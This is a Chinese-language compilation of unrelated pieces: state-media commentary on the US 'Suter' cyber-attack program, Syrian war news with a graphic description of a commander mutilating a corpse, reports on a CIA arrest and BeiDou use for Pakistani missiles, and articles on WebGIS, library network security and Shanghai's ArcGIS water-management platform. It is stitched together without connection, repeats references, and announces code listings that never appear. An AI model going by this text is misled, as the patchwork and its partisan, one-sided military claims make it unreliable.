事实上,“舒特”从2000年开始实施后,就采取了渐进式推进方法,两年为一个周期,陆续发展了“舒特-1”至“舒特-5”。其中“舒特-1”“舒特-2”“舒特-3”“舒特-5”参加了2000年、2002年、2004年和2008年的“联合远征部队试验”,“舒特-4”参加了2006年的“红旗”军演。

加速进入实战,助力“1号力量”

美军官方首次披露“舒特”项目并介绍其功能,是在2001年7月27日美国国防部呈交国会的《网络中心战》报告的附件中。文件指出:“舒特”是美国空军实现“从传感器到射手”无缝一体化作战网络的步骤之一。

到了最近几年,美军已具有将“舒特”构想付诸行动的能力。特别值得关注的是,美国《宇航日报》2006年1月报道了EC-130H飞机加改装的消息。截至目前,美国F-22、F-35、EA-18G和F/A-18E/F等新型战机,都携载了新型、远程、有源电扫阵列,具有部分电子攻击和网络入侵功能,以更好地适应赛博/电子攻击任务。其中,一些类似“舒特”的网络入侵功能,还准备安装到高功率微波导弹、MALD-T干扰型导弹以及能执行电子攻击任务的MK82系列炸弹上。

美国海军作战部负责信息作战的副部长兼海军情报局局长戴维·I,多赛特认为,“舒特”是对下一代干扰机能力的一种很好描述,制作的吊舱可挂载到战术飞机和无人机上,通过有源电子扫描阵列辐射源生成远程数据流。这些数据波束含有专门的波形和算法,可以像钥匙那样去打开网络。

2012年1月,美空军出台《1号力量理论文件》,重新定义空中力量:“能够通过对空中、太空和网络空间的控制来投放军事力量或发挥影响力,从而实现战略、战役或战术目标”。种种征候表明,“舒特”作为未来战争中夺取网络空间控制权的武器装备,已经成为美军各军种特别是空军手里的一张王牌,并且正在加速进入实战化阶段。

意欲独占先机,图谋网上“称霸”

就在美国不断宣扬所谓“中国黑客网络攻击”的同时,美军却在马不停蹄地发展能够置对手于死地的战场网络攻击能力,与他国形成了网络空间作战新的代差。除了意图对对手防空系统构成难以抵御的威胁,他们还期许对对手未来作战形成全面挑战。

去年8月9日《华盛顿时报》报道,美国战略司令部司令罗伯特·凯勒上将罕见地宣称:“我们需要有能力通过网络空间实施进攻行动,就像我们在其他领域实施进攻行动一样。”“美军已经做好了实施进攻性网络打击的准备,包括制定了令敌方核设施瘫痪的计划。”美军作战,信息攻击通常一马当先,获得无线网络攻击能力的美军意图独占先机,使对手丧失争夺网电空间控制权的能力。美军“舒特”一旦将对手防空阵地、通信节点、主干链路等重要信息目标列为重点打击对象,就可能渗透到对手指挥控制网络节点,进行“信息植入”,使对手作战指挥和行动陷入被人控制的境地。

以上情况足以证实,到底谁是网络空间最大的“APT”(高级持续性威胁),这一点恐怕美国自己也心知肚明。“舒特”的时隐时现,以及近两年来一些国家惨遭“震网”“火焰”病毒武器攻击的事实,让世人不得不警惕到处游荡的网络战争魅影,更加担心愈演愈烈的网络空间军备竞赛。

(据《解放军报》)

叙反对派“挖心生吃”视频曝光政府军夺回村庄

据国外媒体报道,最近,叙反对派指挥官亵渎政府军士兵尸体、“挖心生吃”视频出现在视频分享网站YouTube上,令外界一片哗然。“亵渎敌方士兵尸体也是一种战争罪行,”叙利亚人权观察组织负责人博科尔特称。

nlc202309031545

叙政府军近日宣布攻占边境战略要地,切断反对派武装重要补给线。叙战事升级和伤亡增加,促使俄罗斯、美国、英国等国提高斡旋频率。

叙内战演变为报复性杀戮

最近,一段骇人的“挖心生吃”视频出现在视频分享网站YouTube上,引发各界关注。

在这段未经证实真实性的视频中,据信是叙利亚反对派武装法鲁克旅的指挥官阿布·沙克尔站在一具身穿叙政府军军服的尸体旁,他用一把尖刀剖开了尸体的胸腔和肚腹、从中剜出两个器官。

然后,沙克尔举起这两个血淋淋的器官对准镜头,并大声说:“我对天发誓,巴沙尔的走狗们,我一定会吃掉你们的心脏和肝脏。”话音刚落,沙克尔就举起一个器官、放到嘴边咬了一口。上述血腥表演完毕之后,视频里还响起了欢呼声和叫好声。

目前,叙利亚反对派和沙克尔本人都未对此事进行回应。但是,总部位于英国的叙利亚人权观察组织负责人皮特·博科尔特称,他曾经看过这段视频的未删减版,并且视频中的黑衣男子就是法鲁克旅的创立人和指挥官沙克尔。“亵渎敌方士兵尸体也是一种战争罪行,”博科尔特称,“这表明叙利亚内战正迅速演变为报复性杀戮行为。”

叙政府军夺回3个边境重镇

另据报道,叙利亚军方日前证实,政府军当天占领靠近叙利亚与黎巴嫩边界的3座村庄,切断反对派武装穿过边境重镇的补给线。一名不愿公开姓名的叙利亚政府军中校当天透露,“对3座村庄的攻击从今天上午开始”,战斗持续了3个小时,政府军最终夺回3座村庄的控制权。

美国国务卿约翰·克里近日抵达瑞典首都斯德哥尔摩,与瑞方领导人讨论叙利亚局势。而在结束索契与普京会晤后,英国首相戴维·卡梅伦则来到美国首都华盛顿,与美国总统贝拉克·奥巴马就叙利亚局势交换意见。俄罗斯方面表示,愿意与英国合作发起有关叙利亚问题的国际会议,期待美国作出回应。

(据《钱江晚报》)

美欲在俄特工中发展间谍失败20年前手段早落伍

俄罗斯特工机关的一名高官近日向俄新社表示,抓获以美国驻俄大使馆政治处三等秘书职务作为掩护的美国中央情报局工作人员瑞安·克里斯托弗·福格尔表明,中情局急需在俄罗斯一系列特工机关中发展间谍人员。

俄罗斯联邦安全局此前表示,以美国驻俄大使馆政治处三等秘书身份作为掩护的美国中央情报局工作人员瑞安·福格尔于近日凌晨试图招募俄罗斯特工部门一名工作人员时被抓获。

该名俄高官表示:“中情局特工在试图招募俄罗斯特工部门工作人员时被抓,说明俄联邦安全局工作人员具有高超的职业素质。另一方面,中情局特工同意在深夜见面,冒着最高风险,没有掩护,说明西方缺乏在俄罗斯特工机关中自己的间谍人员,以及不惜一切手段招募俄罗斯间谍的急切需求。”

该名高官表示,俄罗斯反间谍工作人员采取了“经典手法”抓获福格尔,投入了大量人力物力,抓捕行动筹备了不止一个月。

该名高官还表示,以使馆工作人员职务作为掩护是中情局特工的惯用伎俩。此外,从被抓特工身上查获专门的技术装备、被招募俄公民书面指南、大笔钱款和易容用品说明,中情局在俄境内工作中仍然使用二三十年前对付苏联时的间谍手段和方法。

俄罗斯已经宣布将瑞安·福格尔列为“不受欢迎人物”。

(人民网)

中国北斗在巴基斯坦建地面站能为巡航导弹制导

据巴基斯坦媒体报道,中国北京北斗星通导航技术股份有限公司将斥资数千万美元,在巴基斯坦建立地面站网,强化北斗系统的定位精确度。之前,泰国,老挝,文莱、缅甸四国都采用了中国的北斗系统,所以如果能实现的话,巴基斯坦将成为第五个用北斗导航的亚洲国家。

就此消息,记者采访了巴基斯坦防务问题专家、巴国家电视台防务与外交节目主持人苏尔丹·哈里(退役空军上校)。哈里对记者表示,他认为北斗卫星导航系统对巴基斯坦国防有至关重要的作用,特别是能在导航与武器精确打击方面发挥重要作用。

哈里透露,巴基斯坦可能会采取双管齐下的军事策略。在战争情况下,北斗系统和惯性制导能够为巴巡航导弹提供足够多的安全导航。目前巴本土巡航导弹主要采用惯性制导,如“巴布尔”巡航导弹就在运用此系统。其他一些本土巡航导弹,如空射“哈塔夫8”型、潜射或路基“哈塔夫7”型导弹,除采用惯性制导和地形等高线匹配制导技术外,还需使用卫星导航。巴基斯坦的弹道导弹,如“沙欣II”型导弹,更需要利用卫星系统提供导航。

此外,哈里说,北斗系统对巴基斯坦的核威慑能力也起到重要作用。而北斗导航的真正价值在于对潜艇进行准确定位。因为当潜艇位置被准确定位后,只用惯性制导就足够发射潜射导弹。他强调,北斗对于巴基斯坦国防的最大意义在于,使得巴军事打击系统、对抗系统、指挥系统加速现代化。

根据哈里的介绍,去年,中国北斗卫星导航系统应用演示与海外用户体验活动在巴最大城市卡拉奇举行。巴农业、航空、交通、测绘、防灾减灾等有关部门以及相关企业、科研院所、高校代表,通过报告介绍、研讨交流、展览演示等多种形式,亲身体验和感受了北斗系统的建设和应用成果,与中国卫星导航领域的优势企业进行了广泛交流。

哈里告诉记者,北斗在巴基斯坦的用途不仅是国防,巴基斯坦要实现经济腾飞,北斗系统将为这种腾飞增加“视力”、增加精度和效率。他说:“我了解到,北斗系统正在为泰国的抗震救灾系统建立平台,我相信,北斗在巴民用技术部门和科研部门的意义也在增加,一旦巴基斯坦再次遇到天灾人祸等不测事件,北斗一定会大显身手。”

据记者掌握的情况,中国国务院总理李克强本月22日到23日访问巴基斯坦期间,中巴双方有望签署有关北斗系统在巴使用的合作协议。巴基斯坦是中国全天候合作伙伴,中巴两国在北斗系统使用方面,既有民品合作,又有军品合作,这是北斗系统在巴基斯坦使用和在其他国家使用的区别,并且这种区别还将继续下去。

(据《环球时报》)

试论网络地理信息系统研究与实现 篇7

近年来, 计算机技术的快速发展促进了地理信息技术的广泛应用, 随着网络技术的发展以及各领域对地理信息系统的实际需求, 在计算机网络上发布空间数据逐渐成为地理信息系统的一个重要应用, 它可以针对用户需求提供空间信息浏览、查询及统计分析等功能, 逐渐成为地理信息系统发展的趋势。正是基于此技术的网络地理信息系统逐渐成为地理信息系统的一个重要研究分支, 它将地理信息技术与网络技术相结合, 在互联网上发布地理信息, 成为未来信息增值服务业的一个新的增长点。

2 网络地理信息系统

地理信息系统能够对地理空间信息及属性数据实现统一管理, 在城市规划、市政管理、房产管理、交通管理等多个领域都具有十分重要的应用价值。

网络地理信息系统特点及结构:

2.1 网络地理信息系统特点。

网络地理信息系统随着网络技术的发展而对地理信息系统扩展与完善的新技术, 它将互联网同地理信息系统有机结合, 是地理信息系统基于互联网环境下的应用, 使空间信息实现网络化。地理信息系统依靠互联网使功能得到很大的扩展, 使其成为使用广泛的信息信息服务工具。

在网络连通的任一节点, 通过浏览器就可以访问满足用户需要的具有超媒体特性的各种地理空间数据, 实现地理分析、查询、辅助决策等功能。与传统的地理信息系统相比, 网络地理信息系统具有如下特点: (1) 访问范围更加广泛。多个用户可同时访问位于不同地方的多个服务器上的空间数据, 极大方便了地理信息系统空间数据的管理, 使多数据源的分布式管理更加容易实现。 (2) 平台无关性。由于网络地理信息系统都通过Web浏览器进行访问, 对于服务器与客户机的配置没有限制, 使访问空间数据更加透明, 同时能够实现分布式空间数据的协同处理, 有效解决了远程异构数据的共享。 (3) 系统成本大大降低。地理信息系统对系统配置要求较高, 而且需要正版地理信息系统软件, 但对于普通用户而言, 只使用一些最简单的功能, 浪费很大。网络地理信息系统在客户端只需要浏览器即可, 其成本与全套地理信息系统软件相比大大降低。而且, 还能节省大量的软件维护费用。 (4) 操作便捷。要使地理信息系统被用户接受, 就要研发操作方便的地理信息系统, 而最好的选择就是采用浏览器操作以实现用户所需的各项功能, 只要会上网就可以操作软件, 而不需要进行额外的培训。

2.2 网络地理信息系统结构。

网络地理信息系统由网络服务器、具有地理信息系统插件的浏览器、网页描述语言、交互程序等构成。通过互连网进行数据信息共享与发布, 其核心是分布式交互操作, 并在此基础上实现空间数据在线分析处理处理等功能。

3 网络地理信息系统设计思想

3.1 网络地理信息系统协议

HTTP协议是属于应用层基于TCP/IP的一种通信协议, 具有对文本、图像、声音等更多数据类型支持的面向对象及可扩展特性。互联网的迅速发展表明支持传输空间数据的网络协议对于网络地理信息系统的发展异常重要。最好的解决办法就是通过基于HTTP协议, 同时满足地理信息系统数据传输的通信协议实现。由于HTTP协议支持面向对象, 可扩展性好, 这对于构建新的协议非常方便。

3.2 网络地理信息系统的集成

地理信息系统的集成十分重要, 随着相关技术的发展, 专家总结出全关系化、面向对象等方法进行解决, 但在多元数据集成集成方面还多少存在一些问题。随着互联网的应用, 面对的开放性网络包含丰富的资源。网络地理信息系统如何访问外源数据库并检索出所需信息, 就成为多源数据的重要研究方向。

地理信息系统的集成应包括与外源数据建立动态链接以及通过元数据库实现数据处理方法集统一封装两个方面。方法集是由字符串表示的数学公式, 用户可根据实际需要对其进行编辑。

3.3 多线程的并行计算

通常在应用程序运行过程中, 进行复杂检索、计算以及图象刷新等操作时会使整个应用程序处于阻塞状态, 用户只能被动等待。由于网络带宽有限, 多用户同时对同一服务器进行访问会大大降低网络性能, 造成CPU大部分空间闲置。另外, 复杂查询及统计分析等操作也使用户在任务未能完成时只能被动等待其完成后才能继续执行其他任务。上述问题都是因程序采用单线程运行机制而导致的不利结果, 为合理利用网络资源, 网络地理信息系统需建立并发性的多线程计算模型以解决上述不足之处。

3.4 平台无关性

互联网是一个开放性网络, 世界各地联入网络的的主机运行着种类繁多的操作系统, 而它们的唯一共性就是都支持TCP/IP协议。因此, 具有跨平台和可移植性的结构对于提高网络地理信息的应用就具有十分重要的应用价值。

4 网络地理信息系统的实现

4.1 客户端的实现

网络地理信息系统客户端允许相关空间数据及计算在本地浏览器上运行, 客户端应具有GIS插件、Active X控件及GISApplets, 在运行之初这些数据都驻留于服务器, 用户通过向服务器请示, 服务器收到服务请求, 就将用户所需数据传输到客户端, 在其本地进行相关处理。

4.2 服务器端的实现

地理信息系统服务器端接到用户请求后, 把运行结果通过HTML格式向客户端响应。相关空间数据都部署于服务器, 用户的请求都是在服务器端执行, 通过以下技术方案实现。

桌面系统扩展:客户服务请求通过应用网关从服务器中向监控调度程序传输, 同时监控调度程序选择桌面系统执行请求, 完成相关计算, 将结果返回至用户, 最终实现地理信息系统的相应功能。

基于Active X组件地理信息系统服务器利用其独立功能, 形成具有伸缩性的应用服务器。可灵活实现各种应用, 使系统成本大大降低, 性能显著提升。

5 结论

近年来, 地理信息技术已逐渐成为计算机技术发展的主流, 并在众多领域为广大用户提供所需的空间信息服务。今后地理信息系统的发展将围绕以下几方面:网络环境下将采用地理标记语言做为空间数据交换格式;地理信息系统将更加开放;空间数据管理分析一体化;分布式计算网络地理信息系统;地理环境虚拟化;移动地理信息系统的应用。随着空间技术快速发展, 基于超图的网络地理信息系统技术、空间数据库集成技术以及地理信息交互技术等都将成为主流, 而将是网络地理信息系统的功能也将更加完善和丰富, 并广泛应用于人们的工作生活中。

摘要:随着地理信息技术的快速发展, 地理信息系统的应用愈加广泛, 本文较详细地介绍了网络地理信息系统应用, 并针对地理信息系统的实现方法进行了较深入地分析。

关键词:地理信息系统,体系结构,Java应用

参考文献

[1]黄杏元, 马劲松, 汤勤.地理信息系统概论[M].北京:高等教育出版社, 2007.[1]黄杏元, 马劲松, 汤勤.地理信息系统概论[M].北京:高等教育出版社, 2007.

[2]叶水盛, 王世称, 刘万崧.GIS基本原理与应用开发[M].长春:吉林大学出版社, 2008.[2]叶水盛, 王世称, 刘万崧.GIS基本原理与应用开发[M].长春:吉林大学出版社, 2008.

地理信息网络服务平台设计与实现 篇8

1 地理信息网络服务平台

1.1 基本组成

GIS地理信息网络服务平台是由GIS地理信息数据、服务器和客户端3个部分组成。用户通过Web客户端,满足不同用户对空间数据处理、分析的需求,为不特定的用户用其灵活、高效的方式提供查询和分析功能、空间数据浏览功能。

1.2 功能介绍

设计并实现的地理信息网络服务平台具有:地图浏览功能、最短路径查询功能、面积测量功能、图上调度指挥功能和综合查询统计功能。

1.3 工作流程

地理信息网络服务平台工作流程如图1所示。

2. 地理信息网络服务平台设计

2.1 平台架构

地理信息网络服务平台架构如图2所示。

2.2 功能模块

2.2.1 地图管理

用户登录平台可根据需要选择省份、城市、县城、辖区等范围内分层浏览地图。地图可进行任意放大和缩小,便于用户应用,提供平面地图、鸟瞰地图、卫星地图3种地图浏览方式,符合用户兴趣和习惯。

2.2.2 路径查询

路径查询功能提供某地到某地的路径规划查询,可查询两点间直线距离和交通距离,其中交通路径可规划出最短距离和最佳行车路线。此外,提供城市交通服务,譬如:公交车、地铁的换程地,换乘车次,距离站点距离等。

2.2.3 面积测量

面积测量是在给定地图上测量长度和面积,可调用Open layers接口实现模块功能。

2.2.4 调度指挥

在地图上可建立坐标点,并标注坐标点名称和简介,通过标准历史记录快速定位到标注所在位置,便于对车队、团队等的指挥。该模块可利用无线网络和GPS实现地理信息、地理位置实时监控。

2.2.5 综合查询

综合查询模块可根据用户需要进行多想模块共同表达的方式,便于用户调用多种数据表进行关键词筛选,有助于用户快速准确地找到所需。

2.3 数据库设计

系统数据库的数据存储于ArcSDE对应的RDBMS中并且组织和存取使用ArcSDE空间数据引擎来实现。

3 地理信息网络服务平台基本功能实现

3.1 地图浏览

地图浏览功能可根据用户需要放大或者缩小地图显示范围,地图浏览功能实现代码如表1所示。

3.2 最短路径查询

最短路径查询功能是确定两点之间的最短距离或者是最佳路径的分析算法,其在交通指挥、GPS导航方面具有良好应用。

最短路径查询算法:

(1)求出已知两点(X1,Y1)和(X2,Y2)所在的道路节点标识码JID或中心线段标识码EID、用中心线段长度的百分比表示EPOS(中心线段具体位置)。

(2)确定所用权值w,权值类型为距离、行驶时间、速度或组合权值,如选定为组合权值,则值依据情况动态生成。

(3)根据中心线段标识码EID或道路节点标识码JID、EPOS(中心线段位置)计算已知两点之间相对应的最短(最佳)路径所需要经过的道路节点标识码JID(i=1,…,L;L为路径经过节点数)和中心线段标识码EID,(j=1,…,D;D为路径经过的中心线段数)。

(4)通过EID、JID、JID、EP0S、EID计算各中心线段上的权值也就是指消耗,同时把对应的路口和路段名称在道路几何网络中进行查询。

(5)报告反馈和显示分析后的结果。

3.3 面积测量

面积测量功能是对所需测量区域进行区域面积的计算,其在农田、水利、城区建设等方面具有良好的实用价值。

部分代码实现如下:

3.4 图上调度指挥

部分代码实现如下:

3.5 综合查询统计

综合查询统计功能是针对以上地理信息网络服务模块进行组合应用,可快获取所需地理信息服务数据。

部分代码实现如下:

4 结语

设计实现GIS地理信息网络服务平台,该平台具有地图浏览功能、最短路径查询功能、面积测量功能、图上调度指挥功能和综合查询统计功能,通过对平台架构的分析确定平台的功能模块,并对模块进行具体设计和实现,该系统应用范围广泛,对人们的生产生活具有良好的互联网地理信息服务功能。

摘要:随着科学技术的发展,以GIS进行地理位置精准定位,生活信息快速查询、交通状况实时监控等被广泛的应用。设计并实现了基于GIS的地理信息网络服务平台。该平台具有地理信息应用的基本功能,其中包括:地图浏览、最短路径查询、面积测量、图上调度指挥和综合查询统计功能。

关键词:地理信息服务平台,GIS系统,网络服务,在线地图

参考文献

[1]郭子敏.浅谈数字大庆地理信息公共服务平台建设[J].测绘与空间地理信息,2014,(02).

地理信息网络 篇9

随着计算机网络与通信技术的高速发展, 计算机越来越多地应用到社会生产与生活的众多领域, 近年来国内高校自动化与网络化建设不断发展, 数字化图书馆建设也迅速发展起来。但网络如同一把双刃剑, 网络环境在带给高校图书馆巨大变革, 实现网络信息资源的共建共享的同时, 让我们必须同时面对网络的开放性所带来的方方面面的安全问题, 如病毒泛滥、系统漏洞增多、黑客入侵攻击等。

高校图书馆数字化建设过程中, 馆藏文献资源体系结构不断向数字化、网络化多元化发展, 网络信息资源的共享性, 使信息资源得以分散, 减轻了图书馆信息资源承载负荷, 节约了大量的人力、物力和财力, 提高了工作效率, 但网络信息资源的分散共享性又导致了网络的脆弱性、复杂性以及网络受到各种攻击的可能性。因此, 如何保障图书馆网络安全高效运行, 成为高校图书馆自动化网络化建设进程中必须面对的关键问题。

1 图书馆网络安全影响因素分析

1.1 计算机病毒

计算机病毒, 是在计算机程序中插入的破坏计算机功能或者破坏数据, 影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。计算机病毒具有繁殖性、传染性、潜伏性、隐蔽性、破坏性以及可触发性等特点, 曾出现过的CIH、熊猫烧香等病毒均对社会造成过巨大的经济损失[1]。计算机病毒是高校图书馆面临的一大威胁, 一旦感染或侵入, 病毒便可不断繁殖、扩散到到内部工作网上的各台计算机, 这将可能导致整个图书馆网络在短时间内陷入瘫痪, 致使所有网络服务无法开展, 甚至还会毁坏数据及网络设备, 给高校图书馆造成巨大的经济损失。

1.2 软件因素

图书馆网络系统的软件因素, 涉及到操作系统软件和图书馆管理自动化应用软件两个层面。操作系统方面, 目前高校图书馆主要使用的是Unix、Windows NT、Windows 2003Server等, 无论是哪一种系统, 都会不可避免地存在一些漏洞, 而这都容易遭受计算机病毒或其它人为因素的破坏[2]。在图书馆自动化管理应用软件方面, 目前各高校图书馆所采用的管理软件各不相同, 开发水平、软件成熟度上便各有不同, 因而在安全性能上存在差异。如果所选用的管理软件开发水平不够高、安全性能不足, 便会在安全方面存在各种各样的隐患。

1.3 网络环境因素

在高校图书馆的自动化网络化建设进程中, 网络设备所处环境必须作为一个不可忽视的环节。网络设备通常对其所处的物理环境都有较高的要求, 部分高校图书馆在网络化建设中或多或少地存在着重视网络硬件设备而忽略网络外部环境建设的问题。网络设备除防水、防火、防震等常规要求外, 对所处环境的温度、湿度、空气质量、静电和电磁干扰等物理条件也有严格要求, 忽略这些环境因素, 都将对图书馆后续的网络信息安全留下隐患。

1.4 管理制度因素

在高校图书馆的自动化网络建设进程中, 在解决计算机网络安全问题时, 非技术性措施如管理因素在整个计算机网络管理中也是至关重要的。管理因素主要包括了相关制度的健全性、分工的明确性、相关监督措施的力度等方面, 图书馆网络平台的正常运转, 必须以完善的管理制度作为前提与保障。有的高校图书馆正是因为没有健全严格的管理制度, 导致馆内计算机网络时断时续, 严重影响图书馆各项服务的正常开展, 因此, 仅有符合要求的网络硬件环境, 如果管理水平低下, 管理缺乏力度, 图书馆的网络信息安全也得不到保障。

2 图书馆网络安全问题应对策略

2.1 严防网络病毒

我们对计算机病毒并不陌生, 计算机病毒在网络中泛滥已久, 计算机病毒一旦感染, 通常会在局域网中快速繁殖, 致使局域网内计算机间的相互感染[3]。应考虑将业务工作局域网与校园网隔离开来, 在其接口处架设硬件防火墙, 来保证内外网间通信的安全性;对任何文件的使用, 必须先利用最新反病毒软件检测, 一旦发现病毒及时查杀;对所安装的反病毒软件应及时更新, 对系统应进行定时全面检测, 以及时发现并清除病毒;高校图书馆的馆藏数据有其特殊的动态性, 它直接反映了本馆馆藏文献资源的流动状况, 因此, 对馆藏数据应做好定期备份, 以避免其遭受网络病毒的入侵。

2.2 建立规范化网络技术体系

高校图书馆业务工作网络安全, 是图书馆业务系统和数据信息得以保存并可靠运行的支撑, 为了保证其安全稳定地运行, 防止非法人员访问、防止数据泄漏和丢失和防止非法数据进入, 就必须建立一套规范化的网络技术保障体系。必须为系统设置开机口令、软件口令以及特殊操作口令等一系列口令体系, 且在使用过程中要定期更换;对于重要服务器须采用单独网段进行隔离、身份鉴别、备份及恢复等应急措施进行有效防护;对图书馆日常数据的备份工作必须严格执行, 对于服务器可通过磁盘备份工具实现双机热备, 此外还应定期对数据进行机外备份, 将数据异地存放, 为整个网络系统数据的安全性提供保证。

2.3 做好网络环境建设

网络设备通常对其所处的物理环境都有较高的要求, 部分高校图书馆在网络化建设中或多或少地存在着重视网络硬件设备而忽略网络外部环境建设的问题。在良好的网络环境下, 网络设备的使用寿命可以更长, 且网络的安全稳定性能也可大大提高[4]。在网络机房位置的选择上, 应避开污染源和强电场等不良环境, 机房的内部装修应要具有较高的防火、防水、防尘、抗静电、防雷击及抗磁场干扰等功能;在机房的内部配置上, 应具备自动火灾报警消防系统、干粉灭火器、空调设备, 电源应选专线, 且应该有良好的接地线和漏电保护装置等。

2.4 健全网络安全管理制度

高校图书馆在文献信息资源及网络体系建设方面, 投入了大量的人力、物力和财力, 但如果缺少一个完善的网络安全管理制度, 任何先进网络产品都无法有效发挥作用。因此, 高校图书馆应逐步完善业务工作网络安全管理制度, 包括机房管理、软硬件维护管理、网络安全管理、系统安全管理、电子阅览室管理、备份和恢复管理、安全事件报告和处置方面的管理、应急响应方法、应急响应计划等制度, 并建立完善的跟踪体系, 做到职责明确, 责任到人, 在实现网络信息资源共建、共知、共享的基础上, 保障数字资源及信息系统业务的可持续性。

3 结语

高校图书馆网络信息安全是一项综合因素众多、技术含量很高的复杂工程。保护高校图书馆的网络信息安全是图书馆员义不容辞的责任, 当然, 要彻底消除各种安全问题是不可能的, 只能通过各种方式来加以防范, 图书馆网络安全依赖于相关信息技术的进步, 同时也依赖于管理制度的不断完善以及人员素质的全面提升。S

摘要:高校图书馆是高等学校的文献信息中心, 目前图书馆网络信息安全问题越来越受到人们的重视。对目前威胁高校图书馆网络信息安全的因素作了较为全面的分析, 并结合自身实践针对性地提出了相应的应对策略。

关键词:高校图书馆,信息资源,网络安全

参考文献

[1]赵晓红, 雒伟群, 刘伟光.高校图书馆网络安全分析与防护策略[J].计算机与信息技术, 2009 (3) .

[2]李太芳.高校图书馆网络安全防范技术探析[J].产业与科技论坛, 2009 (8) .

[3]王应, 刘子辉.当前高校图书馆网络安全问题分析与对策[J].重庆科技学院学报:社会科学版, 2011 (17) :151.

地理信息网络 篇10

水务信息化是覆盖多行业、多层面、多应用的庞大系统工程,覆盖水文、水利、供水、排水等行业,贯穿省、地市、区县等层面,支撑防汛保安、水资源管理、水环境整治、水土保持、政务办公等应用。水务一体化管理对信息整合共享,有效支撑基础管理和公共服务提出了新的需求。水务(利)部门陆续开展了信息化建设工作,取得了丰硕的成果[1,2,3,4]。随着管理内涵的扩大、需求的增加,如何充分利用Web2.0时代的技术优势,实现各类业务部门的信息共享和业务协同,为管理部门提供有效的决策支持,做到“专业部门做专业事情”,是值得研究的课题。

上海市水务局是集水利、供水和排水于一体,在全国第1家实现水务统一管理的省级水行政主管部门。1998年开始将GIS技术应用于水务信息的综合管理中;2004年以来按照“顶层设计、统一标准、资源整合、系统集成、共建共享、分级维护”等原则,构建了基于WebGIS的水务公共信息平台;2008年将ArcGIS Server应用于水务公共信息平台,利用Tile Cache,GIS Server等相关理念和技术,实现了防汛应急指挥、水资源管理及相关专题应用,通过网络与Google,ESRI及上海市测绘院基础地图等地图,以及上海市排水专题数据等相关资源在“一张地图”上的融享,在水务信息综合管理中进行了有益的实践。

1 地理信息服务技术的优势

GIS集计算机、信息学、地理学等多门学科为一体,运用系统工程和信息科学的理论,科学管理和综合分析具有空间内涵的地理数据,突出对现实世界空间关系的模拟。GIS具有空间可视化、导向及思维的特点,能够存储各地物的空间信息和关系,实现空间和属性等信息的集成管理,并通过无级缩放的地图,对现实世界的空间关系进行直观展现,即“所见即所得”。

ArcGIS Server是功能强大的基于服务器的GIS产品,用于构建集中管理的,支持多用户的,具备高级GIS功能的企业级GIS应用与服务。通过提供广泛的基于Web的GIS服务,以支持在分布环境下实现地理数据管理、制图、地理处理、空间分析、编辑和其它的GIS功能[5]。

城市水务综合管理是GIS技术体现空间思维特征的最典型的应用领域,GIS技术在城市水务综合信息管理方面的应用,是信息时代对现代水务管理工作提出的新要求。

2 地理信息服务的总体架构

ArcGIS Server体系架构主要由数据,GIS Server,Web Server客户端等组成。

数据包以服务的方式发布到GIS Server的GIS资源,如地图文档、Geodatabase等。用DBMS在数据服务器上部署的ArcSDE Geodatabase可以实现数据的安全性、完整性和高效性。

GIS Server用于宿主GIS资源,将其发布为服务,供客户端应用,并响应客户端的应用请求。

Web Server用于部署Web应用和服务,这些应用和服务使用GIS Server提供的资源。

在上海市水务信息综合管理中,一方面通过ArcGIS Server对本地基础、行业、规划等资源,进行有效管理、整合及应用;另一方面通过网络充分利用Google Map,Arcgis Online,微软地图,以及上海市相关部门的在线业务资源,充分发挥AGS(ArcGIS Server)企业级应用和服务的优势。ArcGIS Server在上海市水务信息综合管理中的应用框架如图1所示。

3 空间数据存储

空间数据主要包括1998年以后每1~2年的上海市中心城区1:500,外环内及中心城镇1:1000,郊区1:2 000的全要素基础地形图,全市0.6 m分辨率的Quickbird卫星,1.0 m分辨率的Spot卫星,0.25 m分辨率的航空等多比例尺和多时相的遥感影像数据,以及全市水务工程设施、应急指挥、规划管理等业务数据,总数据量超过3 TB。

数据存储管理采用Oracle10g+ArcSDE组合模式。ArcSDE作为ArcGIS与关系数据库之间的GIS通道,具有高性能、多用户、可伸缩、长事务处理、面向对象数据模型等特点,可以保证存储于关系数据库中的矢量和栅格几何数据的高度完整性,这些数据包括矢量和栅格几何图形,支持x,y,z的坐标,曲线,注记,元数据和空间模型等。

根据数据类型,空间数据库分为基础、设施、应急管理、水资源管理等数据库,历史数据按年单独存储。空间数据库列表如图2所示。

4 地理信息服务的制作及应用

4.1 地图配置

为灵活支撑应用层中各模块,分别制作了基础底图、遥感影像、实时监测、行业监管、规划管理、行政许可、台风路径等30余幅专题地图,每个专题地图只包含特定的图层,最终在统一平台中互相叠加形成完整的上海市水务综合地图。地图制作利用ArcGIS Desktop的专业制图和编辑工具,地理坐标系统采用上海地方坐标,吴淞高程。可对每个图层进行字体、颜色、样式等美工设计,做到地图整体协调,条理清晰,重点突出,工程设施则按照上海市水务信息管理标准进行标绘。

4.2 地理信息瓦片制作技术

上海市每年度的基础地形图和遥感影像数据都达几百GB,直接制图会导致服务器端压力大,出图慢。应用ArcGISServer 9.3的地图瓦片缓存机制,预先将全市地图划分为11个比例尺,对每个比例尺的地图事先预处理,切分成若干个小图块,客户端访问时直接获取指定比例尺下的小图块,可以有效地提高地图的访问速度。制作地图缓存时,不同的参数配置将影响地图服务的显示效果,这些参数包括起始点坐标、比例尺分级、切片格式、压缩比、图片高宽、DPI、缓存类型等。瓦片参数设置为格式png8,图片大小为512 pix×512 pix,96DPI,融合缓存,创建后的地图服务能够与其它部门实现地图熔享。瓦片级别如表1所示。

4.3 地理信息服务发布技术

地图服务通过ArcGIS Server创建并发布,主要包括以下2类:1)静态地图服务,对数据量巨大,更新不频繁的基础底图和遥感影像地图发布为静态的瓦片服务,优化应用系统绘制底图的效率;2)动态地图服务,对有数据更新、查询、定位需求的实时监测,行业监管,规划管理等专题地图制作为动态地图服务。

4.4 地理信息服务应用技术

发布后的地图服务都有1个类似于http://IP ArcGIS/rest/services/服务名/MapServer的服务地址,应用程序通过ArcGIS Server接口引用该地址便可以创建对应的GIS Server,实现将分布于不同区域的数据资源叠加集成在1张地图上。

5 地理信息服务应用实践

采用WebGIS作为应用集成的主要技术手段,开发主要采用REST API模式。这种轻量级开发模式具有丰富的客户端展示功能和令人期待的发展潜力,只要熟悉业务,通过客户端脚本技术调用相应的GIS功能,就可以满足功能需求。

5.1 防汛保安应用

5.1.1 台风路径发布

